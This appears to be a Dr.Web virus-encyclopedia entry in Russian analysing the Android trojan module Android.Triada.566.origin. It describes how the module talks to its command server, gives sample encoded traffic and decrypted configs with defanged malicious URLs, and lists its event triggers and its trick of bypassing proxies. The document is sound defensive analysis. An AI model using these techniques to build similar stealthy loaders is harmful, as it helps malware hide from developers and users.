ПОЛЬЗОВАТЕЛЯМ

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Android.Triada.566.origin

Добавлен в вирусную базу Dr.Web: 2021-02-01

Описание добавлено:

SHA1-хеш:ccf8624ac3236068bf15a46d3f1335ac7b43992d

Известные модификации:

  • Android.Triada.548.origin (SHA1 77ede5d5ed2c06fe7596666869d3455f86756254)
  • Android.Triada.554.origin (SHA1 f888a0d26e6f80ed14a06abb7c721280011c735e)

Описание

Троянская программа, работающая на устройствах под управлением ОС Android. Представляет собой вредоносный модуль, загружаемый в память трояном Android.Triada.4912, а также другими вредоносными приложениями семейства Android.Triada. Ее основные функции — загрузка и запуск дополнительных модулей, а также демонстрация веб-сайтов.

Принцип действия

Android.Triada.566.origin загружается в память базовым компонентом, для этого используется главный троянский класс com.bb.s2x2e.go.AAA, имя которого указано в начале файла, содержащего модуль:

screenshot <b>Android.Triada.566.origin</b> #drweb

Основными методами, доступными для вызова базовым модулем, являются initMe и time.

Метод initMe(Context, String, View.OnClickListener)

При вызове метод выполняет следующие действия:

  • скачивает или запускает вредоносные модули из сохраненной локально конфигурации;
  • удаляет локальные файлы трояна, конфигурацию и настройки, если это указано в его настройках;
  • загружает удаленную конфигурацию с сервера hxxps://wcf[.]seven1029[.]com, если отсутствует сохраненная действительная конфигурация;
  • после успешной загрузки локальной или удаленной конфигурации View.OnClickListener, переданный при инициализации, получает событие onClick(null);
  • регистрирует широковещательный приемник на системные события, вызывающий метод time из основного троянского класса. К отслеживаемым событиям относятся включение, выключение или разблокировка экрана, изменение конфигурации сети, начало зарядки аккумулятора и т. д.

Метод time(Context, String, boolean)

При вызове метод выполняет следующие действия:

  • открывает ссылки в браузере (в зависимости от настроек и значения последнего аргумента);
  • скачивает или запускает вредоносные модули, указанные в сохраненной локально конфигурации;
  • загружает удаленный файл конфигурации с сервера hxxps://wcf[.]seven1029[.]com.

Детали работы

Соединение с C&C-сервером hxxps://wcf[.]seven1029[.]com для получения конфигурации и загрузки модулей Android.Triada.566.origin открывает следующим образом: (HttpsURLConnection)url.openConnection(Proxy.NO_PROXY). В результате оно открывается, игнорируя настройки прокси. Предположительно это делается для того, чтобы разработчикам при тестировании ими затронутых приложений было сложнее заметить подозрительную сетевую активность, вызванную действиями трояна.

Пример обмена трояном информацией с C&C-сервером:

POST /BBService.svc/wewrdcazxpkl HTTP/1.1
accept: */*
Connection: Keep-Alive
Encrypt-Type: 1
Compress-Type: 1
Req-Windy-Fire: false
Content-Type: application/json;charset=utf-8
Content-Length: 610
User-Agent: Dalvik/2.1.0 (Linux; U; Android X.X.X; XXX Build/XX.X.X.X.XXX)
Host: wcf.seven1029.com
Accept-Encoding: gzip
{"input":"H4sIAAAAAAAAAG2SUW+...EibjlwCAAA="}HTTP/1.1 200 OK
  
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/8.5
ENCRYPT: 1
COMPRESS: 1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, XX Apr 2021 XX:XX:XX GMT
Connection: close
Content-Length: 1464
"H4sIAAAAAAAEABW...9FBQAA"
  

Данные в поле input и ответ сервера закодированы Base64 и сжаты gzip. Пример данных, отправляемых на сервер при запросе:

{
    "pn":"com.apkpure.aegon",
    "gd":"dbaa3d76-0dc9-4afd-b061-917aa78d748f",
    "channel":"2021-3-22-ssk015-ym2",
    "version":"sdk_3",
    "ua":"Mozilla\/5.0 (Linux; Android XX.X.X; XXX Build\/XX.X.X.X.XXX; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/89.0.4389.105 Mobile Safari\/537.36",
    "simCountryIso":"",
    "simOperator":"",
    "networkOperator":"",
    "networkType":"0",
    "networkCountryIso":"",
    "sysVer":"XX.X.X",
    "buildTag":"release-keys",
    "root":"true",
    "ipInfo":"var returnCitySN = {\"cip\": \"XX.XX.XX.XX\", \"cid\": \"RU\", \"cname\": \"RUSSIAN FEDERATION\"};",
    "randomtime":"XXXXXXXXXXX",
    "canChange":false
}
  

Раскодированный ответ сервера выглядит следующим образом:

{
    "header":{
      "status":0,
      "enc_key":"67186522482"
    },
    "body":"BvvZtjWq...dRj6JESI="
}

Поле body закодировано Base64 и зашифровано шифром desede/CBC/PKCS5Padding, ключ для его дешифровки расположен в поле enc_key.

Примеры дешифрованной конфигурации (поле body) представлены ниже.

Пример № 1:

{
    "rTime":14400000,
    "clickTime":3000,
    "closeTime":15000,
    "count":6,
    "sTime":1200000,
    "hLinks":[
      "{hxxps://game[.]shinegame[.]top/horo/jiao6/index[.]html?gameChannelId=1516"}
    ],
    "hLinkCounts":[
      1
    ],
    "nSenses":[
        
    ],
    "Ainfo":{
      "A":"1",
      "B":99999999,
      "C":14,
      "D":29,
      "E":"1",
      "F":"1",
      "G":null,
      "H":"1",
      "I":1,
      "J":"1.0.0",
      "K":false,
      "ids":[
          "1_1"
      ]
    },
    "wifCtr":true,
    "chanEanble":true,
    "operFb":false,
    "fbapk":{
      "url":null,
      "md5":null
    },
    "biLinks":[
        
    ],
    "randomtime":"XXXXXXXX",
    "dy":{
      "url":"{hxxps://foodin[.]site/UploadFiles/16d8e39f-723f-4f38-b1a2-486192408787[.]apk"},
      "md5":"0bab4bf5b87c9218674c70cd404d691f"
    },
    "changApp":null,
    "changWeb":null,
    "adif":[
      null
    ]
}

Пример № 2:

{
    "rTime":21600000,
    "clickTime":3000,
    "closeTime":15000,
    "count":6,
    "sTime":600000,
    "hLinks":[
      "{hxxps://game[.]yeahgame[.]top/search/1513/index[.]html?gameChannelId=1513"},
      "{hxxps://www[.]toouds[.]top/newGame/index[.]html?gameChannelId=1514"},
      "{hxxps://game[.]shinegame[.]top/horo/jiao6/index[.]html?gameChannelId=1516"}
    ],
    "hLinkCounts":[
      1,
      1,
      1
    ],
    "nSenses":[
      {
          "Id":1536,
          "key1":"2021-2-2-xj-biying",
          "key2":"2021-2-2-xj-biying",
          "key3":"biying",
          "enable":1
      },
      {
          "Id":1538,
          "key1":"v12_ym2",
          "key2":"v12_ym2",
          "key3":"v12",
          "enable":1
      },
      {
          "Id":1539,
          "key1":"v17_ym2",
          "key2":"v17_ym2",
          "key3":"godzilla",
          "enable":1
      }
    ],
    "Ainfo":{
      "A":"1",
      "B":99999999,
      "C":14,
      "D":29,
      "E":"1",
      "F":"1",
      "G":null,
      "H":"1",
      "I":1,
      "J":"1.0.0",
      "K":false,
      "ids":[
          "1_1"
      ]
    },
    "wifCtr":false,
    "chanEanble":false,
    "operFb":false,
    "fbapk":{
      "url":null,
      "md5":null
    },
    "biLinks":null,
    "randomtime":"XXXXXXXXXX",
    "dy":{
      "url":"{hxxps://foodin[.]site/UploadFiles/20210408011826[.]apk"},
      "md5":"f4f206651de1fdc3ace73cfcf32d54fc"
    },
    "changApp":null,
    "changWeb":null,
    "adif":null
}

При этом ссылки, полученные в поле hLinks, открываются в браузере, а по ссылкам, полученным в поле dy, загружаются другие вредоносные модули.

У всех модулей, загружаемых Android.Triada.566.origin, должен иметься класс com.bb.cc.main.Main с методом init(Context, String) , который используется как точка входа при загрузке модуля в память. Этому методу передается загруженная с C&C-сервера конфигурация, которая поступает в расшифрованном виде.

При вызове метода initMe троян регистрирует широковещательный приемник на получение следующих системных событий:

android.intent.action.SCREEN_OFF
android.intent.action.SCREEN_ON
android.intent.action.USER_PRESENT
android.intent.action.BATTERY_OKAY
android.intent.action.PACKAGE_ADDED
android.intent.action.INPUT_METHOD_CHANGED
android.intent.action.BATTERY_CHANGED
android.intent.action.ACTION_POWER_CONNECTED
android.net.conn.CONNECTIVITY_CHANGE

При получении этих событий, если есть подключение к сети, запускается метод time из главного троянского класса com.bb.s2x2e.go.AAA. При вызове этого метода указывается, открывать ли заданный в команде веб-сайт в браузере. При наступлении события разблокировки устройства (android.intent.action.USER_PRESENT) указывается, что необходимо открыть заданную ссылку, при остальных событиях — нет. Кроме того, метод time также может вызываться базовым модулем трояна.

Новость о трояне

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Российский разработчик антивирусов Dr.Web с 1992 года
Dr.Web в Реестре Отечественного ПО
Dr.Web совместим с российскими ОС и оборудованием
Dr.Web пользуются в 200+ странах мира
Техническая поддержка 24х7х365 Рус | En

Dr.Web © «Доктор Веб»
2003 — 2021

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125124, Россия, Москва, 3-я улица Ямского поля, д.2, корп.12А